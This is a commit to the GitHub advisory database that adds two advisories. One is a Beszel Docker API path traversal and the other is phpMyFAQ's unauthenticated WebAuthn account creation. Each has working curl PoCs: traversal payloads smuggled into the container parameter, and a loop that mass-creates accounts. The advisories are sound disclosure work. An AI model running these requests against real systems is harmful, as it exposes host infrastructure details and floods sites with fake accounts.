Publish Advisories

advisory-database[bot] · advisory-database[bot] · commit b3710a194d00 · 2026-02-27T21:04:18.000Z
GHSA-phwh-4f42-gwf3 GHSA-w22q-m2fm-x9f4
diff --git a/advisories/github-reviewed/2026/02/GHSA-phwh-4f42-gwf3/GHSA-phwh-4f42-gwf3.json b/advisories/github-reviewed/2026/02/GHSA-phwh-4f42-gwf3/GHSA-phwh-4f42-gwf3.json
@@ -0,0 +1,68 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-phwh-4f42-gwf3",
+  "modified": "2026-02-27T21:01:05Z",
+  "published": "2026-02-27T21:01:05Z",
+  "aliases": [
+    "CVE-2026-27734"
+  ],
+  "summary": "Beszel: Docker API has a Path Traversal Vulnerability via Unsanitized Container ID",
+  "details": "### Summary\n\nThe hub's authenticated API endpoints GET /api/beszel/containers/logs and GET /api/beszel/containers/info pass the user-supplied \"container\" query parameter to the agent without validation. The agent constructs Docker Engine API URLs using fmt.Sprintf with the raw value instead of url.PathEscape(). Since Go's http.Client does not sanitize ../ sequences from URL paths sent over unix sockets, an authenticated user (including readonly role) can traverse to arbitrary Docker API endpoints on agent hosts, exposing sensitive infrastructure details.\n\n### Details\n\n**Hub** (internal/hub/hub.go:407-426): `containerID` from query param is only checked for emptiness, no format validation:\n```go\ncontainerID := e.Request.URL.Query().Get(\"container\")\nif systemID == \"\" || containerID == \"\" { ... }\ndata, err := fetchFunc(system, containerID)  // passed directly to agent\n```\n\n**Agent** (agent/docker.go:651-652 and 682-683): raw containerID interpolated into Docker API URL:\n```go\nendpoint := fmt.Sprintf(\"http://localhost/containers/%s/json\", containerID)\nendpoint := fmt.Sprintf(\"http://localhost/containers/%s/logs?stdout=1&stderr=1&tail=%d\", containerID, dockerLogsTail)\n```\n\nGo's http.Client preserves `../` in paths over unix sockets (verified with test code). The Docker daemon resolves them via cleanPath, routing the request to unintended API endpoints.\n\n### PoC\n\nTested on Beszel v0.18.3 with hub and agent running in Docker (host network mode).\n```bash\n# Authenticate\nTOKEN=$(curl -s -X POST \"http://localhost:8090/api/collections/users/auth-with-password\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"identity\":\"user@example.com\",\"password\":\"password\"}' | jq -r '.token')\n\nSYSTEM=\"<system_id>\"\n\n# Path traversal: Docker version (returns full engine version, kernel, Go version)\ncurl -s \"http://localhost:8090/api/beszel/containers/info?system=$SYSTEM&container=../../version?x=\" \\\n  -H \"Authorization: Bearer $TOKEN\"\n\n# Path traversal: Docker system info (returns hostname, OS, container count, network config)\ncurl -s \"http://localhost:8090/api/beszel/containers/info?system=$SYSTEM&container=../../info?x=\" \\\n  -H \"Authorization: Bearer $TOKEN\"\n\n# Path traversal: List all images (triggers unmarshal error confirming traversal works)\ncurl -s \"http://localhost:8090/api/beszel/containers/info?system=$SYSTEM&container=../images/json?x=\" \\\n  -H \"Authorization: Bearer $TOKEN\"\n```\n\nAll three requests returned real data from the Docker Engine API on the agent host.\n\n### Impact\n\nAny authenticated user (including readonly role) can read arbitrary Docker Engine API GET endpoints on all connected agent hosts. Exposed information includes: hostname, OS version, kernel version, Docker version, container inventory, image list, network topology, storage driver configuration, and security options. This is a privilege escalation, readonly users should not have access to host-level infrastructure details.\n\n## Researcher\n\nSergio Cabrera\nhttps://www.linkedin.com/in/sergio-cabrera-878766239/",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/henrygd/beszel"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "0.18.4"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 0.18.3"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/henrygd/beszel/security/advisories/GHSA-phwh-4f42-gwf3"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/henrygd/beszel/commit/311095cfddda113863ca9656cf9e99411be1cef5"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/henrygd/beszel"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/henrygd/beszel/releases/tag/v0.18.4"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-22"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-02-27T21:01:05Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/02/GHSA-w22q-m2fm-x9f4/GHSA-w22q-m2fm-x9f4.json b/advisories/github-reviewed/2026/02/GHSA-w22q-m2fm-x9f4/GHSA-w22q-m2fm-x9f4.json
@@ -0,0 +1,61 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-w22q-m2fm-x9f4",
+  "modified": "2026-02-27T21:01:58Z",
+  "published": "2026-02-27T21:01:58Z",
+  "aliases": [
+    "CVE-2026-27836"
+  ],
+  "summary": "phpMyFAQ Allows Unauthenticated Account Creation via WebAuthn Prepare Endpoint",
+  "details": "### Summary\n\nThe WebAuthn prepare endpoint (`/api/webauthn/prepare`) creates new active user accounts without any authentication, CSRF protection, CAPTCHA, or configuration checks. This allows unauthenticated attackers to create unlimited user accounts even when registration is disabled.\n\n### Details\n\n**File:** `phpmyfaq/src/phpMyFAQ/Controller/Frontend/Api/WebAuthnController.php`, lines 63-79\n\n```php\n#[Route(path: 'webauthn/prepare', name: 'api.private.webauthn.prepare', methods: ['POST'])]\npublic function prepare(Request $request): JsonResponse\n{\n    $data = json_decode($request->getContent(), ...);\n    $username = Filter::filterVar($data->username, FILTER_SANITIZE_SPECIAL_CHARS);\n\n    if (!$this->user->getUserByLogin($username, raiseError: false)) {\n        try {\n            $this->user->createUser($username);\n            $this->user->setStatus(status: 'active');\n            $this->user->setAuthSource(AuthenticationSourceType::AUTH_WEB_AUTHN->value);\n            $this->user->setUserData([\n                'display_name' => $username,\n                'email' => $username,\n            ]);\n```\n\nThe endpoint:\n1. Accepts any POST request with a JSON `username` field\n2. If the username doesn't exist, creates a new **active** user account\n3. Does NOT check if WebAuthn support is enabled (`security.enableWebAuthnSupport`)\n4. Does NOT check if registration is enabled (`security.enableRegistration`)\n5. Does NOT verify CSRF tokens\n6. Does NOT require captcha validation\n7. Has no rate limiting\n\n### PoC\n\n```bash\n# Create an account - no auth needed\ncurl -X POST https://TARGET/api/webauthn/prepare \\\n  -H 'Content-Type: application/json' \\\n  -d '{\"username\":\"attacker_account\"}'\n\n# Mass account creation\nfor i in $(seq 1 1000); do\n  curl -s -X POST https://TARGET/api/webauthn/prepare \\\n    -H 'Content-Type: application/json' \\\n    -d \"{\\\"username\\\":\\\"spam_user_$i\"}\" &\ndone\n```\n\n### Impact\n\n- **Registration bypass:** Accounts created even when self-registration is disabled\n- **Username squatting:** Reserve usernames before legitimate users\n- **Database exhaustion:** Create millions of fake active accounts (DoS)\n- **User enumeration:** Different responses for existing vs new usernames\n- **Security control bypass:** WebAuthn config check is bypassed entirely\n\nAll phpMyFAQ installations with the WebAuthn controller routed (default) are affected, regardless of configuration settings.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Packagist",
+        "name": "thorsten/phpmyfaq"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "4.0.18"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-w22q-m2fm-x9f4"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/thorsten/phpMyFAQ/commit/f2ab673f0668753cd0f7c7c8bc7fd2304dcf5cb1"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/thorsten/phpMyFAQ"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-862"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-02-27T21:01:58Z",
+    "nvd_published_at": null
+  }
+}
